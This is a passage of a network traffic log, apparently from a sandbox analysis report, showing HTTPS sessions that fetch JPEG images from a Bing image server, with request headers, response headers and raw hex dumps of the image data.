',i?SoR8kjdrGAI4E+c;}[CSm?Q'p~eP;J1$=GE7H-!l?5Aq'Cg6]"dj#L}\|T-zuju\,)p#GR9<GvmeZ}-DO~Ts'&MvJ5S
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: c1 24 5f f3 f7 e4 c8 bf 6c 7f b9 9f 9f 9f 94 ee ae 4b c3 be 24 b1 d7 b5 5d 26 f2 4d 76 ea de 4f 9b ed 71 43 b5 9b 9d fb b6 f0 31 9f ba 77 67 e5 ad 3f b4 58 ea 3e 2a 5d 37 4b d7 92 5d 3f ec fe 57 92 ef 27 9f 32 ed d8 51 8a af de 46 e4 0f 4a d6 38 49 54 4e 37 e5 fc cf 62 9c e5 5a 16 93 1b aa 58 68 be 64 d6 77 9e 1e 82 5b 88 bf 7f 6f 35 a4 0b 3c f6 79 fb b1 e1 ff 00 8b ee f4 5c d7 25 e3 2f 08 bc 1a 83 6a ba c6 85 ac 45 75 3b ac 76 2f 7d 1b 5a ad 9a 8f bb e5 27 43 fe 73 5e 91 63 f6 6f 07 f8 ab fb 63 c2 ff 00 f0 91 c5 34 56 fb 5d f5 68 3c fb 37 90 af cb f3 a1 dc 9e d5 e7 9f 1a a4 f1 7c 57 56 fa 96 a1 ab 5d 4f ab 5e 6e 93 ec f7 73 ac ed 6a bf ec 7c d8 da 47 d2 bb 30 35 31 34 2b a8 c6 dc bd db 6f ee 5f ad ce 2a 98 58 c6 77 b1 e7 fe 28 f1 4d 9f 87 ee ae ed f4 fb Data Ascii: $_lK$]&MvOqC1wg?X>]7K]?W'2QFJ8ITN7bZXhdw[o5<y\%/jEu;v/}Z'Cs^coc4V]h<7\|WV]O^nsj\|G0514+o_Xw(M
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: c2 c5 1b 7b 7f a4 5c 3b 45 3b e5 bf da c8 e0 7f 74 54 77 5e 21 d7 2f ee ad e1 f0 ae 9b 1b 69 ff 00 6b 68 a5 86 ee e9 a5 fb 4a 86 f9 9e 2f 37 3b 91 4f f7 5b 23 d2 b6 ef b5 4f 0e 6a f6 3f 65 ff 00 89 ad be b5 14 cd 14 df 67 4f dd 4d 1f f7 70 f8 08 cb b7 b1 ae 9a b8 74 af 28 68 df 5e a6 d0 ad 39 db 99 68 50 9b c5 12 e8 9a 6a 5c 6a 17 fe 6c 76 bf 2a 5c 79 7f 71 8b 7d ef f6 c5 69 37 8a e3 d2 3c 54 8d a7 c1 23 42 d0 aa dc 5b c3 f3 2b b7 97 f3 4b bb 77 7d db f3 f4 ac df 1a 41 e1 cd 7b c3 30 d9 e9 be 65 d3 7d ad 7e dc f3 3b 79 bb 47 f0 c6 bf 77 6f cb cb 2f f0 d6 3c 97 1a 36 93 a9 4d 75 fd a5 6b fd 9b 15 a4 3b 2f ac 77 4f b3 7a f0 a3 23 e4 db b3 9a e4 a7 84 52 a7 7b 6a cc ea 62 39 aa 28 5f 44 77 eb e2 bb 3d 2f ed 7a b4 97 f2 34 cb 6f e5 42 9b 15 9b ea 71 c3 57 1f Data Ascii: {\;E;tTw^!/ikhJ/7;O[#Oj?egOMpt(h^9hPj\jlv*\yq}i7<T#B[+Kw}A{0e}~;yGwo/<6Muk;/wOz#R{jb9(_Dw=/z4oBqW
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: d4 f1 e4 f0 4f e3 14 d6 9a c6 d6 fe 15 99 96 6b 4d 8b b5 23 0b 80 0d 75 37 5a 47 82 6f 2e ad ef 26 82 35 fb 46 d5 89 13 e5 fd e1 ff 00 57 f2 8f bb 5c 4a bf b2 84 6a 49 b6 e4 bf a4 6d 28 ab b5 d1 1c 4a cf 73 6b 3f 9d 67 e6 5b c7 2a 2e c7 77 dc af f2 8f 97 d0 f5 e4 76 ad 7d 3f 50 b3 b7 d3 7e c2 b1 c0 cd 2b af da 13 63 79 5b 7a fc f5 9f e3 23 2e 9b a9 5c 47 e4 79 b0 da bc 8b 0f cf e6 f9 39 c2 02 bd b7 66 ad 78 46 ca f2 d6 7b 18 f5 0b 4b ab 8d 16 f2 66 89 37 ce b7 52 c2 c5 b6 3f cb c3 2f ad 6b 2c 3c 2b 43 9d 7a 82 aa e0 56 f1 06 8f e1 36 d0 ef af 23 d2 64 ba 6d eb 3d c2 23 b6 de 57 1b be 6f e1 03 ff 00 1e ac 8d 1f c1 fa 44 f3 ea 0b a6 ea 5f 60 fb 3d db 4f 35 c3 dd 47 6b 14 2a 57 6a 05 77 fb df f0 1e b5 df dc 78 93 4f b3 d5 6e e3 59 2c 62 b8 b7 45 8a 1f b4 47 Data Ascii: OkM#u7ZGo.&5FW\JjIm(Jsk?g[.wv}?P~+cy[z#.\Gy9fxF{Kf7R?/k,<+CzV6#dm=#WoD_`=O5GkWjwxOnY,bEG
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: 75 1f 85 6e e5 15 4a 4a 4b 6f d0 d3 0f 5e a3 9b 8d f4 46 fd 8e 9f a3 5b dd 5c 79 9a 2f db fe 75 59 b6 22 ed 75 ec bf 7b 3f 85 4b 75 06 95 0d f5 c6 a1 71 77 6b a3 5a c5 fe 9d 71 6c 9b 9b ed 32 0e df 37 1c 74 0b eb 51 e8 fa ce a5 06 a9 fd 93 a4 f8 7b 43 d4 7e cf e6 45 6f 7d e7 b2 cf 37 4c 3c 9f c2 d8 eb da b2 35 8f 0f f8 f1 75 cd b7 5a 6e 9d 71 35 e7 ef f6 3c eb 2a a3 6e f9 47 5c 27 0d f8 d7 24 a2 e4 ec de e7 75 4a f4 55 ae 53 9b e2 2d a6 ad e2 3b b9 21 9e fa 2f 36 25 68 5f e5 5f 25 51 be 7f 97 ee b7 bd 77 3e 1b 95 6f 77 dc 2e a5 26 a8 ab 71 fb eb 7b 89 fe 59 94 2e ef 2f d7 7f 6e 78 f9 78 35 e1 ea d7 9f f0 94 26 9b 71 63 e4 2c 57 2a b7 d2 bd 92 fc f3 19 33 b3 76 7e 4c 7c d8 ad ff 00 0e c5 ae 5c f8 c2 d3 4f d0 63 d5 6f d5 62 f9 e5 74 f2 9b ef 79 92 21 d9 90 Data Ascii: unJJKo^F[\y/uY"u{?KuqwkZql27tQ{C~Eo}7L<5uZnq5<nG\'$uJUS-;!/6%h__%Qw>ow.&q{Y./nxx5&qc,W3v~L\|\Ocobty!
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: a2 df dd 69 b1 dc 43 b6 de 17 83 cd df 1c 6c 33 b7 76 07 bf f7 ab bd 61 60 e0 9b 96 9e a2 72 b7 bd 73 27 c4 c7 c4 be 28 92 6d 3f 47 d3 75 2f b5 7f aa 87 c9 db 13 24 83 38 f3 a4 cf c9 bc 71 b1 7f 13 5d 57 8c 3c 35 63 75 e0 38 61 bc 83 fe 26 9a 4b ab 5d df 4d 74 b1 6f 8c 28 f3 36 aa f4 cb f4 f5 15 c8 f8 cb 5b d7 2e a7 d2 61 87 56 8e ea f1 51 65 b8 b7 44 dd fb ce 4f fa b1 f7 f0 bb 78 cd 5a f0 df 8d f5 3b 3b 19 ac fc 69 e7 dd 5a dc 5c 2f fa 3d ba 2c 4b b7 b7 98 c9 bb 72 83 db b5 75 d1 aa a1 4e 2e 0b 4f c4 c6 53 4f 5d cd 3d 43 e1 dd e6 93 a5 4d 6a b1 dd 6a 56 7b 37 25 be 97 02 ed 4d 8d f3 33 ab b0 27 7a e7 eb 5c 5a f8 56 c7 54 9d 1a 1f 0d d8 b2 ad c2 db 5a 5b ea 36 ac cd 34 85 77 fe e9 15 48 5c 77 cd 7a 0d c6 bf 16 a5 75 a8 47 ae 78 b2 3b 8b 86 b7 56 4b 8f 23 Data Ascii: iCl3va`rs'(m?Gu/$8q]W<5cu8a&K]Mto(6[.aVQeDOxZ;;iZ\/=,KruN.OSO]=CMjjV{7%M3'z\ZVTZ[64wH\wzuGx;VK#
2024-11-21 08:53:49 UTC	16065	IN	Data Raw: ff 00 ba ed df 8a ca 78 9a 69 39 4a 1a 1b 73 54 b6 fa 94 3e 0f e8 6b 71 6f 71 33 7d bb ed 92 ee 89 21 87 e5 57 52 a3 a9 35 93 e2 4d 03 c6 ba 5d ad c6 a9 67 a1 7d 82 16 9b 6d 8d bf 96 db b7 37 a7 f7 7d 79 af 78 f0 ed 9a b4 1b ad 60 8f 6b 7c a9 b1 36 b2 29 ff 00 0a a7 e2 ef 0f 6a 16 1e 19 be bc 8e ff 00 ed 97 0d b7 c9 b4 d8 cd bd 8f 19 5e 6b e6 aa e3 63 ed b6 56 7d 19 eb 61 79 9c 52 b9 e2 bf d9 ba 7d e7 82 d2 f2 f2 7f ec bd 72 7b 85 8e f9 2d d3 6b 23 15 db 9d a7 85 5f 5c 57 61 f1 f3 4d f1 77 89 ec b4 cd 07 58 d3 1f 56 ba 5b 48 56 de 5d 26 c6 35 96 e6 3d bf 24 8f c0 f9 b7 71 fe ed 75 d6 7a 3c be 14 f0 ed c7 99 a4 c1 aa 78 c2 2d d3 d8 ff 00 67 5a ac fb 30 b8 f9 8b ff 00 10 af 2b d7 3c 43 f1 47 c1 fa f2 7d aa 0b a5 fe d6 89 99 fe 4d d1 ed 3d 9f 67 a7 a7 6a e5 Data Ascii: xi9JsT>kqoq3}!WR5M]g}m7}yx`k\|6)j^kcV}ayR}r{-k#_\WaMwXV[HV]&5=$quz<x-gZ0+<CG}M=gj
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: 61 a8 79 d7 56 49 77 19 42 85 5f f8 73 fc 43 dc 76 ab 1a 06 93 71 af 6a ed 1d b2 3a 42 9f 34 d2 ec dc b6 f1 ff 00 79 ea 55 a1 e8 67 a5 3b ff 00 2a 31 6a c5 cf 98 15 63 7d d9 5f e1 35 b9 e1 d7 f0 fd 8f c4 0b 57 d4 a0 92 fb 47 82 e3 f7 a9 17 de 99 05 47 f1 22 7d 3e e3 c6 17 b2 69 71 c8 96 ad 2e 51 1f ef 2f b5 1c fe fa 56 05 52 f5 14 6d a5 ae 57 d6 b5 75 be d1 b4 db 15 b2 8a 1f ec f8 99 4c ab f7 a5 cb 67 2d 59 4a 71 c8 eb 4c a2 aa 31 51 56 46 91 8a 8a b2 3a ed 3f 50 f0 e6 ab e3 1b 5b 8f 11 25 cd a6 99 1d be d9 cd a2 2b 48 ee b1 f6 cf 1f 33 55 8d 57 4c f0 d5 cf 80 e0 d5 ac ae 05 8d e2 ca e8 6d e6 66 66 b8 c6 09 e9 d3 15 c4 d2 ee f9 76 d6 72 a3 76 9c 64 d5 8c 7e ae 93 8f 2b 6a c2 51 45 15 b1 d0 14 51 45 00 14 51 45 00 14 51 45 00 7d a5 0e b1 7d 2c 96 8b a3 da Data Ascii: ayVIwB_sCvqj:B4yUg;*1jc}_5WGG"}>iq.Q/VRmWuLg-YJqL1QVF:?P[%+H3UWLmffvrvd~+jQEQEQEQE}},
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: ad 78 da da 38 2d 74 fb e5 92 37 bc b0 48 65 bb d3 ae 1d be 48 dd 43 a6 f4 fe e8 e8 71 fd ea e6 f5 2f 07 7c 44 bf f1 e3 f8 7f 4f d2 6c 5a fa ea 15 96 d2 e1 35 18 d5 66 8c ae ed f1 3b 60 3f cb f8 8a ed c3 50 95 79 73 de fd ce 65 89 8a 86 81 e0 ff 00 18 68 76 52 6b 9a a6 ad 69 e6 dc 45 69 0b 58 bc a8 cd 02 4d e6 61 c4 a7 f8 17 69 aa de 07 d5 2f 35 08 f5 9b 3d 35 e0 d6 ed ed ed fc a9 a1 49 fc af 94 f0 9c f3 f2 8f bf df 9a d3 f0 bd b6 a1 a7 68 f7 6b a8 47 22 ea 57 1f 7d de 0d cb 33 23 6d 41 d3 6c 8a ff 00 3a 1f f6 aa cf c3 5b dd 2b fb 37 c4 9e 1d 87 4d 8f 4b b8 f1 1e 9c ca f7 c9 6a ab f6 28 d1 86 f9 3b 73 e9 fe e5 7b 54 69 51 49 d3 6b fe 1c e7 a9 29 3d 4f 37 d7 be 14 f8 ba 5b d8 b5 1d 4a f6 d2 0b 79 62 55 0e ee bb 6e 58 c9 f2 aa 22 f5 5e 7a f1 51 f8 ae 35 d2 Data Ascii: x8-t7HeHCq/\|DOlZ5f;`?PysehvRkiEiXMai/5=5IhkG"W}3#mAl:[+7MKj(;s{TiQIk)=O7[JybUnX"^zQ5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49758	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	346	OUT	GET /th?id=OADD2.10239370639329_16GDTY03HO5SY2UBG&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
2024-11-21 08:53:48 UTC	854	IN	HTTP/1.1 200 OK Cache-Control: public, max-age=2592000 Content-Length: 770657 Content-Type: image/jpeg X-Cache: TCP_HIT Access-Control-Allow-Origin: * Access-Control-Allow-Headers: * Access-Control-Allow-Methods: GET, POST, OPTIONS Timing-Allow-Origin: * Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]} NEL: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0} Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version X-MSEdge-Ref: Ref A: 8410D176F9E64F02A96CBD5FDA3E6483 Ref B: EWR30EDGE0715 Ref C: 2024-11-21T08:53:48Z Date: Thu, 21 Nov 2024 08:53:48 GMT Connection: close
2024-11-21 08:53:48 UTC	15530	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff e1 1d 32 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 92 87 69 00 04 00 00 00 01 00 00 00 a6 00 00 00 d2 00 60 00 00 00 01 00 00 00 60 00 00 00 01 00 00 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 35 2e 31 20 28 57 69 6e 64 6f 77 73 29 00 00 32 30 32 33 3a 31 31 3a 32 31 20 31 36 3a 32 34 3a 32 32 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 04 38 a0 03 00 04 00 00 00 01 00 00 07 80 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 Data Ascii: JFIF``2ExifMM*bj(1r2i``Adobe Photoshop 25.1 (Windows)2023:11:21 16:24:228
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: e3 7b ab 74 4f dd f9 92 7e f2 9d 1c 7f be ff 00 9e 94 f8 e0 ba d4 25 93 64 3e 63 f9 7e 67 fc 05 6a 25 36 d9 29 b5 a3 35 fe 23 e9 ba 1c 36 b6 49 a0 c5 37 da 23 89 ff 00 b4 7c cf ef ef f9 76 d7 22 ac 16 df 8f bd 5d 4f 8b 7c 41 7f e2 cf 11 7d b5 ec ed 6d fc bb 78 63 78 ed a2 d8 9b 63 4d 95 ca 6d fd ec 89 5a 42 2d a4 69 87 52 50 e5 93 d5 13 aa ff 00 c4 bf e4 aa ac af dc 50 ff 00 2c 7b 28 69 5d aa ad 63 a2 31 68 6b f5 a3 9a 73 26 df 9c 0f 96 9b cd 05 8e ff 00 96 34 de 68 e6 8e 68 00 e6 8e 69 cb 1f f7 a9 bc d0 17 4c 3f da a7 03 ba 3d b4 22 bd 3a dd 6a 89 6e c4 6e bb 68 e6 a4 8e 2d d2 d2 48 86 36 c0 a4 87 75 7b 0c e6 8e 69 d1 ae fa 3c b3 eb 45 82 e3 79 a3 9a 1d 76 d1 cd 21 87 35 35 93 22 c9 f3 d4 28 db 6b 63 45 82 c6 ef 52 8c 6a 13 79 10 6c df 21 a6 95 d9 15 1d Data Ascii: {tO~%d>c~gj%6)5#6I7#\|v"]O\|A}mxcxcMmZB-iRPP,{(i]c1hks&4hhiL?=":jnnh-H6u{i<Eyv!55"(kcERjyl!
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: 83 27 ef ff 00 d4 ef f2 ed db f8 eb 83 f1 3e ab 69 a2 eb 91 e8 be 1b ff 00 4c b5 d2 ee 61 ff 00 48 b9 fb f7 72 af fe cb 5c 55 31 d1 c4 41 fd 5d ea 8c 6a 62 9d 59 25 05 6b 1f 5d 7c 24 d4 f4 5b dd 26 4b 5b db 3f b1 49 1f ee fc b8 a2 df e6 4b fe fd 73 fe 22 f8 9e fe 1d b4 d3 6e af b4 29 7f b1 e3 d4 66 b7 92 48 e5 fe 35 fe ea ff 00 15 72 5e 16 f1 7f 88 25 f1 16 8b a4 09 ad 23 ba 92 54 8e 4f f9 f7 b4 9e 4f 9d bf df f9 6b cf a4 6d 4a e3 56 92 d7 c7 1a c5 af 91 1c 93 7d 8a 3f b5 a3 fe f7 7e e6 7d bf ed 57 c3 bc bf eb 71 9c 71 11 f7 7f 33 9e 12 82 ab a1 ec 57 5a be ab f1 92 ee db fb 77 4e d4 34 af 09 69 f1 ba 69 d6 d1 7d fb f7 6f e3 7f f6 56 bc 37 e3 b7 c2 0d 73 4f f1 5e 81 68 9a ec be 25 92 e2 3d 9f 67 8a 2f df 41 12 bf f8 57 b0 78 57 e2 d7 87 bf e1 20 b1 d0 ae Data Ascii: '>iLaHr\U1A]jbY%k]\|$[&K[?IKs"n)fH5r^%#TOOkmJV}?~}Wqq3WZwN4ii}oV7sO^h%=g/AWxW
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: 74 fb 7f ec eb 3f b4 5c dc 1f fd 14 9f ed 9a 9c b3 19 89 95 06 f1 aa d2 2f 09 8a a9 ca fd ba d4 f3 85 2e df 20 34 f8 ed 9d be e8 af 5b f8 b3 f0 96 c7 c1 1e 03 b2 bd 9f 52 9a e3 5e b8 d9 25 cd b4 71 6d 8a d1 19 33 c9 fe f5 64 78 12 d6 1b af 09 49 0d b6 93 0e f9 24 f2 2e 35 5b 89 7e 48 f3 ce d5 af 46 96 32 95 58 39 d3 77 46 f2 c7 41 d3 e7 a7 ae b6 3c df e7 fb 95 63 cd 55 fd d3 d5 9f 11 49 6d fd a1 b6 0f 9e 38 fe 5a a3 94 69 2b a2 32 ba 4c ea 4f 9e 2a 4d 58 5b a9 de 6f f7 6a 1e 6a e3 b2 34 5b 2a 29 a4 23 e4 aa ea 54 65 6d 12 20 e6 a4 8d bf 73 42 c5 23 7c d5 24 cb ba 3d ff 00 72 9d d1 4d ab 85 d2 7f ab fd ef 99 be 8d ab 0f cd fe b2 a1 64 db 4e dc eb 15 08 56 d0 6e e7 6a b1 1d b7 f0 7f 1d 57 b5 ff 00 59 5a 5e 6a 5b cb f3 d4 39 34 45 49 35 a2 28 dc db b4 3d 6a Data Ascii: t?\/. 4[R^%qm3dxI$.5[~HF2X9wFA<cUIm8Zi+2LOMX[ojj4[)#Tem sB#\|$=rMdNVnjWYZ^j[94EI5(=j
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: c1 73 33 47 b3 fd 5a 54 1a a7 96 ad f2 7c f4 2d 47 19 c9 ce cc ac a2 2a 87 9a b9 a6 d9 fd a3 ee d4 ad 06 d8 be 4a 6d 97 ed 62 9b 45 5d a8 b4 54 f6 f0 7f 1d 14 73 10 ea 24 cf b3 75 9f 0d 5a 68 fa 4d 8d d7 89 34 db bb d8 ed ed bf d1 a4 ff 00 96 37 0f bf e7 db 5d 7e 9b e0 5d 26 e3 49 b6 d5 2f 61 b4 b2 fd da 7d 9a 49 7f b9 fe ed 6f 7c 5b f1 c5 84 5a 7d 8e 82 f3 5a 49 a6 c7 fe 97 1e a5 e5 7c f1 bc ae ff 00 c3 ef 55 60 9e 0b 2d 12 c7 4b ba 9a 6f b5 5e d9 3c 92 49 ff 00 3e fb 7f b9 5f 9a d6 c5 e2 39 2f 1d cf 46 58 67 4d b2 69 fc 4b a2 da 43 e4 59 4d e6 47 65 27 97 fe ab fe 05 5c 04 7a d4 1f f0 b2 24 4d 46 ce 69 20 b8 fd e7 97 ff 00 3e ff 00 ed 57 5b e1 1b c9 f5 5f b3 59 3e 9b 34 7e 67 fa 44 97 32 c4 9b ee 3f 87 ee d5 af 8b 9e 13 f0 f6 89 e0 8b ed 5d e1 f3 2f a3 Data Ascii: s3GZT\|-G*JmbE]Ts$uZhM47]~]&I/a}Io\|[Z}ZI\|U`-Ko^<I>_9/FXgMiKCYMGe'\z$MFi >W[_Y>4~gD2?]/
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: e6 6a 5f f2 d3 f8 d2 37 6a ee af be 18 5f de ea 1a 6d d4 fe 2a fb 45 f5 94 9e 5c 76 57 31 79 2f 6e ec 9f fa 0d 79 b7 8d 3e 1c f8 de 28 63 79 ec e6 b7 82 f6 f7 cb 96 48 a5 fe ef f7 bf d9 a8 a3 8a 8b 4e 30 91 95 6c b6 1f 0d b4 3b 29 ec 74 5d 6f 50 b2 d3 be d9 fd 9d 3c 9f e8 f7 3f f4 cd ff 00 bd 4c d5 7c 43 7f e1 fb bf ec 4b 29 bf b4 63 b7 fd e7 da 6d be 4f 31 fe ef cc ff 00 ec d6 27 86 7c 35 e2 1f 10 78 8a 4b 28 fc 98 ee ad f7 dd fe f6 5f ee a7 f1 32 fd e6 6a e4 bc 63 73 ad 68 ff 00 66 df 67 0f 99 e5 cd e6 47 14 4f e4 c6 ec 9f c5 fe e5 4d 39 55 94 ed 27 73 97 fb 35 53 5c ed 68 7a 36 a4 ba 16 b7 34 68 97 9f 6d f2 ed 93 cc fd ef fa b7 6a b9 a5 2e 93 a7 fe e2 ca 1f 2e b9 0d 3b 5c d4 a5 f0 cc 69 fd 9b 69 fe b5 24 f3 22 8b fd 8a 96 38 35 29 61 df 6b fe be 4f f5 Data Ascii: j_7j_m*E\vW1y/ny>(cyHN0l;)t]oP<?L\|CK)cmO1'\|5xK(_2jcshfgGOM9U's5S\hz64hmj..;\ii$"85)akO
2024-11-21 08:53:48 UTC	16384	IN	Data Raw: ed a8 2e 3c cb a9 ff 00 e5 a7 fa cf 36 bc df 4b 91 e5 f9 fc a9 77 d6 c4 0b 3b cb b1 ff 00 d5 d7 7c 68 26 96 87 85 3c 47 22 69 ee 6b be 9b a6 ea 1a 8e cb 5f dd d5 8f f8 43 65 96 6d 90 4f 17 fd b4 a9 fc 3f a7 c6 f5 d3 41 02 27 dc ad 9d 47 0d 13 39 14 79 f5 67 25 07 83 2f 1f ef 98 a9 ff 00 f0 88 dc 27 78 ab b8 b5 8a 0a 9a 78 a3 fb e9 53 f5 99 5c cf d9 3e a7 11 6b e1 af f9 e9 35 6c e9 ba 2c 76 ff 00 72 b6 7c aa 73 c5 b2 94 ab 39 22 52 51 77 48 ce 8f 4f df 35 4f 05 9c 76 f7 75 6a 3f 33 ee 24 35 76 d6 0f ef d6 13 e6 5a 95 ed 17 72 7d 1e da 34 9b 7f fc b4 ae a2 c6 29 1e b1 ac 62 f2 a6 de f5 a9 6b 73 1b 4d bd 2b c4 c5 46 52 67 45 0a 96 57 2d 3a c1 14 df 24 3e 65 61 dd 4b a6 e9 9e 64 f3 cd fb cf f5 9f bd ab 57 d3 dd bc db 2d 61 9a 4f fa 69 5c d5 df 85 75 6d 56 ee Data Ascii: .<6Kw;\|h&<G"ik_CemO?A'G9yg%/'xxS\>k5l,vr\|s9"RQwHO5Ovuj?3$5vZr}4)bksM+FRgEW-:$>eaKdW-aOi\umV
2024-11-21 08:53:49 UTC	16065	IN	Data Raw: c4 77 16 fb f8 7f e1 fb b5 32 c9 6b 28 ba 91 76 5d 11 c7 ed 94 ee a5 23 b6 f8 bb aa 47 67 e1 3f 09 a4 3a 76 a0 f2 69 d2 5c c1 a8 db 4b 2f fc bc 79 db be 7f ae ea ea be 1c ff 00 c2 35 e2 5b 48 dd fc 9f 3e 3b 67 b7 d4 ac af a2 f2 52 39 77 ff 00 0f f2 ae 0f c3 37 9f 6b fb 4e 91 3d 9c d2 6a 3a ac 6f 27 99 e6 ef 78 ee 17 2f 13 ff 00 8d 50 f0 7d 8f 8a 3f b7 23 83 57 bc 9a 38 24 df 77 e5 c7 f3 fd a2 7f e0 8f e5 fe 2d d5 d5 0a 3f bb e5 96 8c eb a3 ee ca e7 b2 78 f3 e0 cf 84 2d f4 48 d2 cb 52 fd fd c6 ff 00 2e db 4d 89 26 79 3e 4a f0 2d 63 4c fe cf b4 b2 df ac 7d 8e ef 4e 8f f7 91 c9 0b a3 f9 bb fe e7 fb 4c b5 ea fa 8e ab e2 ff 00 0a 1b dd 52 7b c8 b4 ef 13 5c 5b 79 9f 66 92 2f dc c6 8d f7 bf d9 e6 b8 0f 12 78 e6 0f 14 69 d2 5d 6b a6 59 35 8d 3e 5f b5 f9 92 9d f6 Data Ascii: w2k(v]#Gg?:vi\K/y5[H>;gR9w7kN=j:o'x/P}?#W8$w-?x-HR.M&y>J-cL}NLR{\[yf/xi]kY5>_
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: b9 ab 11 41 27 d9 7e d2 92 e2 85 14 55 d2 2a f3 57 34 75 df 36 cf 27 cc a2 c6 da 36 8f 7c b3 79 75 0a ef 4b 8f dd 49 f3 7a d3 50 e5 64 3d 74 24 78 3f d2 b6 4d fb ba af 37 de 15 af 1d a4 d7 56 d9 f3 62 46 ac a9 e0 92 29 76 3d 54 d6 9a 21 45 dc 6f 98 7d 2a 58 f6 34 7f 3d 40 dc 1a 73 ff 00 b1 59 f3 3b 94 e3 71 d2 37 ef be 4a 6c 8d ba 9b cd 1c d2 94 ae 50 73 52 db cd b0 e1 fe e5 45 cd 1c d2 57 4c 03 69 a1 1b 6d 58 b1 29 e6 6c 7f e3 a4 ba 48 e2 9b 62 1f 32 ab 95 0a e3 60 9e 68 a6 f3 93 ef d1 51 3f 5a 2a 6e fb 87 2a 3d df c5 5a d7 89 2d fc 79 a2 7c 42 d2 ec ff 00 d2 bc bf b3 c7 e6 c5 bd 24 75 fd df fe 83 5e 71 7d af 5d ea 7e 36 d3 af 7c 4f 7b a8 48 2d e5 fd e0 3f f2 c3 e7 dd b5 3d b3 5f 58 78 ba c7 49 d7 7c c8 2f 74 d8 74 e9 3c cf 32 3f 2a 5d 89 5e 27 f1 0b c1 Data Ascii: A'~UW4u6'6\|yuKIzPd=t$x?M7VbF)v=T!Eo}X4=@sY;q7JlPsREWLimX)lHb2`hQ?Zn=Z-y\|B$u^q}]~6\|O{H-?=_XxI\|/tt<2?*]^'
2024-11-21 08:53:49 UTC	16384	IN	Data Raw: b4 8f 0d 68 41 3d a2 5a 6c 9e ad 6d 8e 2b 4d f0 7f cb 4a 9e 66 3e 5b ee 57 8e 78 12 1a af 25 f4 69 0f 97 07 ee ea 8c 9e 7a 7f d7 3a af 1b 6d f9 e9 f2 8d 24 8b 1b 63 fb ef 53 fd 99 25 8b fd 4f 97 54 3c f9 1a ad 7d af f7 35 4b 64 05 39 b7 a7 c8 69 02 1d 9b aa 46 64 63 c0 d9 4d 98 22 cb f2 1d e2 a6 56 dc a1 9c d4 d6 26 dc 4b fe 93 14 92 27 a4 66 a1 e6 8e 6b 30 34 af 2c 2d 16 c7 ed 56 ba 94 32 73 fe aa 4f 96 5a cd e6 8e 68 e6 80 0e 68 a1 7a d1 5a 28 b6 07 de ba a2 c1 a5 78 66 3b bb a8 6d 35 5b af f9 e7 7d 0f 9d e5 a3 27 ee fe f7 f1 ef f9 6b 9e 9b fb 27 c5 ba 4c 7e 27 be b3 9a 48 2c ef 52 3f b3 47 f7 27 b7 d8 9e 6a ff 00 c0 2b b2 d5 7c 2b 7f e2 59 a4 b5 b5 fe cf fd de a3 6d 3f da 7c df 9e 44 5a 2f bc 23 27 86 b4 3f ec 84 9a 18 ed 74 e8 a6 b8 f3 3f e7 e3 77 cc Data Ascii: hA=Zlm+MJf>[Wx%iz:m$cS%OT<}5Kd9iFdcM"V&K'fk04,-V2sOZhhzZ(xf;m5[}'k'L~'H,R?G'j+\|+Ym?\|DZ/#'?t?w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.6	49761	150.171.27.10	443

Timestamp	Bytes transferred	Direction	Data
2024-11-21 08:53:48 UTC	375	OUT	GET /th?id=OADD2.10239394186284_1SPGPKBFTZ4EQ1P55&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate, br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045 Host: tse1.mm.bing.net Connection: Keep-Alive
